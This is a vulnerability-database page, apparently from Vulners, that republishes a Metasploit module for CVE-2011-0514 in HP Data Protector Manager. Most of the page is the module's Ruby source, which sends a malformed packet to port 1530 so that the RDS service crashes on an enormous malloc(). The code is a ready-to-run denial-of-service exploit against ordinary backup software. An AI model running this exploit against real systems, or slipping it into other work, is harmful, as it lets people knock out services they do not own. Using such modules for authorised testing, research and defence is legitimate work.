Lucene search
K

HP Data Protector Manager RDS DOS

🗓️ 08 Apr 2011 07:56:48Reported by Roi Mallo <[email protected]>, sinn3r <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 21 Views

This module causes a remote DOS on HP Data Protector's RDS service by sending a malformed packet to port 1530, resulting in an enormous size for malloc() and crashing the RDS service

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2011-0514
8 Jan 201100:00
circl
CVE
CVE-2011-0514
20 Jan 201118:00
cve
Cvelist
CVE-2011-0514
20 Jan 201118:00
cvelist
NVD
CVE-2011-0514
20 Jan 201119:00
nvd
OpenVAS
HP (OpenView Storage) Data Protector Manager DoS Vulnerability
27 Jan 201100:00
openvas
OpenVAS
Beckhoff TwinCAT 'TCATSysSrv.exe' Network Packet Denial of Service Vulnerability
22 Sep 201100:00
openvas
OpenVAS
HP (OpenView Storage) Data Protector Manager RDS Service DoS Vulnerability
24 Jun 201100:00
openvas
Packet Storm
HP Data Protector Manager RDS Denial of Service
31 Aug 202400:00
packetstorm
Prion
Code injection
20 Jan 201119:00
prion
RedhatCVE
CVE-2011-0514
9 Jan 202610:03
redhatcve
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Dos

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'HP Data Protector Manager RDS DOS',
      'Description' => %q{
          This module causes a remote DOS on HP Data Protector's RDS service.  By sending
        a malformed packet to port 1530, _rm32.dll causes RDS to crash due to an enormous
        size for malloc().
      },
      'Author'      =>
        [
          'Roi Mallo <rmallof[at]gmail.com>',  #initial discovery, poc
          'sinn3r',                            #msf
        ],
      'License'     => MSF_LICENSE,
      'References'  =>
        [
          [ 'CVE', '2011-0514' ],
          [ 'OSVDB', '70617' ],
          [ 'EDB', '15940' ],
        ],
      'DisclosureDate' => '2011-01-08' ))

    register_options([
      Opt::RPORT(1530),
    ])
  end

  def run
    buf  = "\x23\x8c\x29\xb6"  #Header
    buf << "\x64\x00\x00\x00"  #Packet size
    buf << "\x41"*4            #Data

    connect
    print_status("Sending malformed packet...")
    sock.put(buf)
    disconnect
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 Oct 2020 20:00Current
10High risk
Vulners AI Score10
CVSS 25
EPSS0.48867
21